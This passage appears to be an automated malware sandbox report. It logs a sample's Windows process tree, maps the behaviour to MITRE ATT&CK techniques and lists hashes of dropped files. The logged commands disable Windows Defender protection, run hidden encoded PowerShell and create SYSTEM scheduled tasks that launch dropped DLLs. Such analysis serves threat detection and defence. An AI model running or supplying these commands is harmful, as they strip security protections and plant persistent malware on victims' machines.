\"C:\ProgramData\NGysLhxJEZNwhMVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NGysLhxJEZNwhMVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mrYrpJCpOmktZWwz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mrYrpJCpOmktZWwz\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:7064
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:323⤵PID:5788
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:324⤵PID:6536
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:643⤵PID:4680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:323⤵PID:6504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:643⤵PID:4352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:323⤵PID:2156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:643⤵PID:2988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:323⤵PID:5988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:643⤵PID:6920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:323⤵PID:1508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:643⤵PID:5984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NGysLhxJEZNwhMVB /t REG_DWORD /d 0 /reg:323⤵PID:1048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NGysLhxJEZNwhMVB /t REG_DWORD /d 0 /reg:643⤵PID:5880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:6064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:6608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:6628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj /t REG_DWORD /d 0 /reg:323⤵PID:6684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj /t REG_DWORD /d 0 /reg:643⤵PID:6916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mrYrpJCpOmktZWwz /t REG_DWORD /d 0 /reg:323⤵PID:7044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mrYrpJCpOmktZWwz /t REG_DWORD /d 0 /reg:643⤵PID:5748
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glbEFdFtv" /SC once /ST 07:26:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:6952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glbEFdFtv"2⤵PID:6564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glbEFdFtv"2⤵PID:5792
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WFVPvOFzrjCnPPlbL" /SC once /ST 04:41:26 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\uNeHwZB.exe\" 7d /mPpwdidpV 525403 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:6200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WFVPvOFzrjCnPPlbL"2⤵PID:5692
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 3684 -ip 36841⤵PID:828
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3940 -ip 39401⤵PID:6640
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
PID:5800 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4008 -ip 40081⤵PID:6708
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1160
-
C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\uNeHwZB.exeC:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\uNeHwZB.exe 7d /mPpwdidpV 525403 /S1⤵PID:4896
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:2720
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:6924
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5548
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:6928
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:5776
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:3348
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:6576
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:4888
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:4352
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2156
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:2988
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:5992
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:3688
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:5572
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:3220
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:3152 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:5900
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "butYHpXTvMdZIJsEKZ"2⤵PID:6212
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:6552
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:4052
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:3264
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
PID:4404 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:3572
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\tffvHWJZU\tmmEYg.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "oiGBDDjiIQmhwtu" /V1 /F2⤵
- Creates scheduled task(s)
PID:1236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "oiGBDDjiIQmhwtu2" /F /xml "C:\Program Files (x86)\tffvHWJZU\nORFYlU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2792
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oiGBDDjiIQmhwtu"2⤵PID:6404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oiGBDDjiIQmhwtu"2⤵PID:6424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mVOvxPujqogGhF" /F /xml "C:\Program Files (x86)\REeMUtPoCvFU2\QQbcyWj.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PuKixiXcCNlkt2" /F /xml "C:\ProgramData\NGysLhxJEZNwhMVB\pofzGhG.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PNkVCGbsoOwbzBvhS2" /F /xml "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\gEkHMXg.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OEjxyANCnYwFWrViDzJ2" /F /xml "C:\Program Files (x86)\kLpsRMujXEpbC\ftDwhRQ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dSPsRFCNvoTMekFez" /SC once /ST 03:35:57 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mrYrpJCpOmktZWwz\zVygYBkk\LcWFhMS.dll\",#1 /tdidJka 525403" /V1 /F2⤵
- Creates scheduled task(s)
PID:5548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "dSPsRFCNvoTMekFez"2⤵PID:6332
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2896
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WFVPvOFzrjCnPPlbL"2⤵PID:5492
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3808
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\zVygYBkk\LcWFhMS.dll",#1 /tdidJka 5254031⤵PID:1196
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\zVygYBkk\LcWFhMS.dll",#1 /tdidJka 5254032⤵PID:3044
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dSPsRFCNvoTMekFez"3⤵PID:5320
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5876 -ip 58761⤵PID:6052
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
2Disable or Modify System Firewall
1Modify Registry
3Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD53331b3dfaf01b5371ac4db5af05a39b8
SHA1badeb66f66d975d7b446b33a0e66c6b923933080
SHA256c06fa75a31321f8803802e2e0a09755c215027e150a85259c4d436b748f5c7dc
SHA512403c57bbae2924b3c1fe26399a6f473a1702ec12d149c214aa3847108d06e51547c959a5a7a3192f9c20cafa740307239a0ff592dc2b88dc5c4ecef80df35954
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
634KB
MD565cd0dc55fd3794f335323368488d8de
SHA118f4657f944e3134bb07536c8793843e6e3f87cc
SHA256562c980db59e71dc5e739a2f925670b2b07b1ec9d257122e98004b1dbe64e13a
SHA5126b425035102484a00e82ca51c45d8f079057b34e0d8a07b07f71dffc5f061156ae345dc91f136c0b087f84fc39e48e572a3d9c64f18818966f2b49bb5bc179c7
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
2KB
MD50b76169d906840d3dc6d6311bc20b2a6
SHA1c1d72192df2f8b0edd02cf192c8622eb7a074dba
SHA25693dfe9d7c55e31f2564cf6458c9949f72e36e4a2c9cfcd265b7d74b6fa32b6aa
SHA5128a0216cfab2d5084737fab09b22be0c71d9ee4ba211c956fa24f55b1a1750f5256f72ed3d46735e9c73b69bceeefae9a52d37cc8459c605b478b55af67c0a281
-
Filesize
498KB
MD5874c9a7097695b51f8dca83eb09e3fdc
SHA19e3d827970443680ffc2269c863309f7d5b56f25
SHA256eefc76781b28ea5ae4cb875bd319b8fba2dc75b6208f21f6eceb9373c09a26c0
SHA512449eb4cf3bd3c7782b652c2d37c5e3157ad9c210f693d393034ecbe4477c4a9bca9fedcb96528df8b5e005b6ad8c46d50a0630f105928ee0ec6161f946840292
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD530ba39f0d9dfc242bcf5a13148c65714
SHA1f35a36a5dd87eec68ee6d1e621224995838f30f2
SHA2566cb7722d1559158bb31024e172b224988f0963e043cb8f60065c94c0e9f5b0a8
SHA512bf732a235af263d14562f0f10495e910f18affdf4dd1f1f0507c470de7e9cc0d3f122f4e114962ab3342c434d71b20e97ee78dde7339a42300cb5a394f500a45
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD503c5516b31080c42ff33a927317945d2
SHA154f5ea7b52a4eddb69812da85f3f6349db47f25f
SHA2567f521076bb6af6832762441ba16bfa83a6cf5f55abcfba68fd84c10c591b920c
SHA512fe55f4067d2304db2af1879ff7c17d29482aefb8100e8f2e92f425c198b24511dc39508e57ef5d4908c7593a785b5e567739b7ff59626c123f7fff01c31b1840
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD57050350133a0d23fe6adacd24fb71155
SHA1861cd416ab05c53ec8c699baf9c27c9391db8723
SHA256d0a45e8cbffe9209bc073f7a4fe8750ecb4a099180a3fd92d0f118aa980f9fdf
SHA5120fe2ac5fe2e25ac36bfeecc0933933eeb1dbef6af6e79b3416e55f855cc3bc6047b9598644b52e4da05fb0d4afec82ade19d3acf2cd8422edc8522513e4cd12f
-
Filesize
2.0MB
MD582f7e39a51aaf2c28ac77ca4fa9ed7ad
SHA13a3c99ca8ff8a7c6ee9ae1be33cd7591c0d9ce8d
SHA256b4c685b1fbabec734efca7e62c5de614717bb6f9f3e324043403e399d707b49f
SHA512f0b26c404d7982f3a8345fca00b4fade127f2fa327a4adb6d1e6c52797598bd36563296dacc8717637c93ec002f8657c431e2b9f0df52f5156a45cde4c938f7d
-
Filesize
1.9MB
MD55fbd844a6ce26deb5337e8e6dd7c7b70
SHA15302e49b2027a07c7bb8f95d45510efc0d954cf8
SHA256f0d640c4e07c81c29f0ec2b603ec3017bdd4db0d0e26c3fa364a6bbf45826058
SHA512c383b5ec9fb9efd53cdf00c2b0940fe60a35a857f8be40ae0763647c3523712553910aca8504768cc86895b2168525fa6043d567e66e0ed5696e2c8e5e7b992d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
11KB
MD5f995b37ace4e02bb657db760d1ece236
SHA190f0ad576f232bfe8fd20983ad213a105bb05216
SHA256fbe424fe0d4833965b84456f831e51cdd1251f70c6b99362b3325cbe730596dd
